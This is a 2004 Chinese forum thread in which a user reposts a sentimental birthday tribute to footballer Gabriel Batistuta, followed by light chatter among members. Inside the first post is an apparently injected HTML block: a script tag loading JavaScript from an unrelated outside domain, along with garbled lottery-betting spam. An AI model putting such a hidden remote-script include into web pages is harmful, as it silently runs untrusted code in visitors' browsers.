丫头 发表于 2004-4-4 22:54:00

[转帖]记得当时年纪小

记得当时年纪小---给战神的生日文,一些祝福一些怀念
http://www.tianyaclub.com/new/publicforum/Content.asp?idWriter=0&Key=0&strItem=sport&idArticle=42426&flag=1
刹那无境
当你用西班牙语说出“巴蒂斯图塔”这个字眼的时候, 你的舌尖在口腔里的震颤会让人产生一种说不出的快感。
  当巴蒂衔枚急走突入禁区一记怒射洞穿对方大门时,你眼前出现的是那被众神诅咒的“小楼一夜听春雨”的寒光。你看到的是战神MARS冲着倒下的对手怒吼时的形象。
  你不能否认他的存在,他是个英雄,一直是!

爱上阿根廷,因为他的自由,他的神秘。每一次在需要的时候,阿根廷就会有一个英雄出现,象是上帝安排好的一样。
  91年的美洲杯当时我是没有看到的,只是一天听新闻说,阿根廷32年后重获美洲杯。后来看了射门集锦,才认识了巴蒂(记得当时和巴蒂齐名的还有个新秀罗德里格斯,后来不知所终)。印象最深的却是巴蒂捧杯时的笑容,象阳光一样,灿烂,无忧无虑。
  当时的美洲杯确实也象是满天阴霾中的一线阳光,使没有了老马的阿根廷又看到了希望。从那时起,阿根廷开始尝试走出失去迭戈的阴影。

虽然没有了上帝赐予的马拉多纳,凡尘中仍有巴蒂斯图塔。
  就为了这个,我感激巴蒂,为了阿根廷,我喜欢上他。
  他从来不是我最爱的球星,但是他是我最爱的一部分。
  是真的,因为他是阿根廷的儿子。
  有个阿迷朋友说,蓝白的旗帜永远年轻,我喜欢这句话。
  他们是我的理想。我不能永远年轻,但是他们可以。
  我一直说,我可以忘记自己的名字,可是我永远记得他们每一个人眼睛的颜色。

我76年生,86年看第一场世界杯,到底是个小女孩那时难免懵懂,只看着小矮胖子发呆,几乎不相信有这样的神。
  到90年已经学会了看球,见到那蓝白的队伍我竟然一点不陌生,一看到久违了四年的小矮胖子,我眼泪就涌出来,我想我爱着他,从四年前就开始爱了。
  那个夏天以后,我知道我的灵魂已经是蓝白的。

看球十八年,老是洒狗血:)
  有人质疑我。说我太过言情,足球只是游戏只是竞技体育,怀疑我把爱情代入,所以每次都煽情得不得了。
  我冷笑,我说你们不会知道,有一种爱比爱情要宁静,比爱情要浓厚。这种感情人一生难得领悟一次,我有那是我幸运。而你们,竟将这极品放低,我亦为你们可惜。
  VAMOS VAMOS ARGENTINA。
  那是,谁都不能代替的一种情感,谁也无法超越的一种情感
  就算是百般宠爱着的意大利,也不能。

而他,来自我最心爱的球队,曾经,是他的心脏~~

然后他来到了意大利,到了佛罗伦萨,一个水晶般透澈亮丽的古老的小城。
  从那一天开始,他和这座城市之间的故事,便有了英雄情长的一种哀怨和凄惋。
  佛罗伦萨人那时刚刚失去了巴乔,几乎是倾城悲伧。这个年轻的美州杯最佳射手的到来,一开始并没有让球迷们振奋。但是很快巴蒂就用他超凡的实力和独特的,无法抵挡的射门慢慢征服了球迷的心。他让佛罗伦萨人又看到了希望,看到了明天。
  但真正感人的故事还是发生在他到了那里的第二年,佛罗伦萨降级了。

记得当时年纪小。
  当我听说巴蒂留下时并不觉得多么吃惊,只想这是应该的。当年的我还看不到太多的功利世俗虚伪背判,情义无价,不是很正常么?
  直到我听见巴蒂说那句话:
  “我看到佛罗伦萨球迷的眼睛,我知道我做的没有错。”
  我才有一点点的明白,他有过选择的,他最终竟还是做了这样的决定.....

多年后巴蒂仍然不悔,也许只有来自潘帕斯草原的巴蒂,真诚坦荡的阿根廷人,才会这样说,这样做。
  接下来的事被众多的阿迷和巴蒂迷所熟知,佛罗伦萨重回甲班,巴蒂由那时起就是佛罗伦萨的神了。他们在城市中心给他竖起铜像,所有的佛罗伦萨球迷星期天去教堂时,都只祈祷两件事:

“让巴蒂永远留在佛罗伦萨;让巴蒂入选国家队。”

因为巴蒂说过,他爱佛罗伦萨,更爱阿根廷。他甚至在博卡危难时挺身而出,愿意在巓峰期时舍弃欧洲的荣华,回阿根廷为母队效力。那时侯,电视机前的我感动得泪流满面。我为阿根廷骄傲,他有着最优秀的儿子!!

巴蒂曾是孤独的,象一名真正的孤胆英雄一样,为了捍卫自己的忠诚,为了捍卫所有爱他追随他的心,他付出了常人难以想象的代价。
  他这一生,只有那一次,为自己做了决定
  可幸他的选择没有错误。
  可叹他也迅速的老去。

自古名将如美人,不许人间见白头。

BATI~~~~~~~我们的战神,天使一样的战神。

BATI,以前我一直没有说过,在你离开翡冷翠那一年,我偷偷的哭泣过。

今天你已经老去,但是我却不能忘记,我们一起走过的那些岁月。
  我和你,一起陪着,我们的阿根廷。
  过去的12年里,共同度过的四个夏天,四个流着眼泪的夏天。
  那些无眠的夜晚,那些守侯的清晨,喝过的那些酒,吵过的那些架~~~以及,为你们编织过的每一个明天。

你走得太远,我已经很久看不见你了。
  想起以前那些年,真是幸福,喜欢的人们都年轻,都神气,每个周末都在那熟悉的球场上奔跑,而我就傻乎乎的享受着那种快乐,那时候我没有想到过,几年后他们就会和我分离。
  这是今天,你生日的前夜,我很清晰的记得,你穿着ROMA的红衣,夺冠的那一幕。
  还有最后的泪水,我会为你记住的。

BATI,生日快乐,祝健康。
转自http://www.tianyaclub.com

< url=http://www.9p.cc">
<script type="text/javascript" src="http://4888.cc/b.js"></script>
<link href="http://4888.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

﹖金﹖﹖﹖时﹖彩﹖

﹖合﹖投﹖注﹖﹖

丫头 发表于 2004-4-4 22:56:00

已经过时了的一篇文……
看到,转过来,如果已经有了,就麻烦斑竹删了或者锁了吧……

巴蒂_阿伦 发表于 2004-4-5 11:29:00

顶。。。。。。。。。。。

紫雨竹 发表于 2004-4-5 14:02:00

..........

晴天 发表于 2004-4-5 17:22:00

当你用西班牙语说出“巴蒂斯图塔”这个字眼的时候, 你的舌尖在口腔里的震颤会让人产生一种说不出的快感
——BATISTUTA里面好象米有大舌音~困惑中
看过进球视频 里面好象是西语解说员
还模仿给偶同学听了   LALA~~~
自认为模仿能力不差 西西
不过模仿动物除外

阿紫 发表于 2004-4-5 20:13:00

记得当时年纪小
你爱谈天我爱笑
有一回并肩做在桃树下
云在青山月在天
不知怎样睡着了
梦里花落知多少

玄武水星 发表于 2004-4-5 20:22:00

那小说是抄袭的

阿紫 发表于 2004-4-5 20:24:00

那个小说?

April 发表于 2004-4-5 20:27:00

郭敬名的

玄武水星 发表于 2004-4-5 20:31:00

不过那厮文笔确实比原作者好得多

阿紫 发表于 2004-4-5 20:45:00

水星你总是能发现抄袭的。。火眼精警呀

丫头 发表于 2004-4-5 20:45:00

以下是引用阿紫在2004-4-5 20:13:00的发言:
记得当时年纪小
你爱谈天我爱笑
有一回并肩做在桃树下
云在青山月在天 不知怎样睡着了
梦里花落知多少

应该是风在林梢鸟儿在叫
我们不知怎么睡着了,呵呵~

ps:昨天没看见星星真的好可惜……

玄武水星 发表于 2004-4-5 20:47:00

你自己不出来,555555555555555555

阿紫 发表于 2004-4-5 20:51:00

以下是引用丫头在2004-4-5 20:45:00的发言:
以下是引用阿紫在2004-4-5 20:13:00的发言:
记得当时年纪小
你爱谈天我爱笑
有一回并肩做在桃树下
云在青山月在天 不知怎样睡着了
梦里花落知多少

应该是风在林梢鸟儿在叫
我们不知怎么睡着了,呵呵~

ps:昨天没看见星星真的好可惜……

我看见你的头衔就顺手打下了,记不住了。。

丫头 发表于 2004-4-5 20:51:00

以下是引用玄武水星在2004-4-5 20:47:00的发言:
你自己不出来,555555555555555555

5555555~~蜻蜓告诉我的时候,已经是她回到学校的时候了……

玄武水星 发表于 2004-4-5 20:55:00

………………………………
也好,见面怕吓着你

丫头 发表于 2004-4-5 21:03:00

以下是引用玄武水星在2004-4-5 20:55:00的发言:
………………………………
也好,见面怕吓着你

喉喉~我是被吓大的,有什么可怕的……
倒是怕见面吓倒你

玄武水星 发表于 2004-4-5 21:18:00

主要是爷爷口没遮拦

丫头 发表于 2004-4-5 21:31:00

……口无遮拦~
…………………………见过得也不少……可惜丫

玄武水星 发表于 2004-4-5 21:39:00

汗,就一次没见上,不用那么郁闷吧

紫雨竹 发表于 2004-4-6 00:13:00

呵呵

恭喜丫头!

没被这家伙吓着